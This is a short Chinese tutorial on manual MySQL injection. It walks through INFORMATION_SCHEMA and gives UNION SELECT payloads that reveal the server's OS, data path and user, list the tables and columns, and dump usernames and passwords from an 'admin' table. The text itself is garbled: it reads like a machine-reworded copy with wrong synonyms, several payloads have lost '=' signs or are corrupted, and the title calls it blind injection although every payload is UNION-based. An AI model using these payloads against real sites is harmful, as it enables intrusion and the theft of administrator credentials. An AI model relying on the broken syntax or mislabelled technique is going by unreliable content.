mysql简略手工盲注技能






申明:固然网上对于mysql手工盲注的材料良多 然而大多都是大篇幅 语句极其庞杂



学习盲注前先懂得下 IFORMATION_SCHEMA 库



Mysql5内置的系统数据库IFORMATION_SCHEMA,其构造如MSSQL中的master数据库，其中记载了Mysql中所有

存在数据库名、数据库表、表字段。重点请求研讨多少个对SQL注入有用的数据表阐明。

1.得到所有数据库名：

'SCHEMATA 存储数据库名的表

'字段：SCHEMA_NAME 数据库名称



'TABLES 存储表名

'字段：TABLE_SCHEMA 表现该表名属于哪个数据库名

'字段：TABLE_NAME 存储表的表名



'COLUMNS 存储的字段名表

'字段：TABLE_SCHEMA 该字段所属数据库名

'字段：TABLE_NAME 存储所属表的名称



'字段：COLUMN_NAME 该字段的名称







###########################################################################



0x001 获取系统信息:



union select 1,2,3,4,5,concat(global.version_pile_os,0x3c62723e,datadir,0x3c62723e,user(),0x3c62723e,version()da tabase(),0x3c62723e,database()),7,8,9 /.



/.



global.version_pile_os 获取体系版本



datadir 数据库门路

database() 当前数据库名称

0x3c62723e 换行HEX值



./







######################################################################



0x002 获取表名



union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema0x67617264656e /.







/.



0x67617264656e 为当前数据库名



group_concat(table_name) 应用group_concat函数 一步获得该库所有表名



./



######################################################################







0x003 获取字段



union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name0x61646d696e and table_schema0x67617264656e limit 1 /.



/.



group_concat(column_name) 同样是 一口吻 取得该表0x61646d696e所有字段



0x61646d696e 抉择一个表



0x67617264656e 数据库名



./



#####################################################################







0x004 获取数据



union select 1,2,3

,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin



union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin







/.



0x3c62723e 换行符,HEX编码



group_concat 同时失掉该字段所有数据



./



BY：nginxshell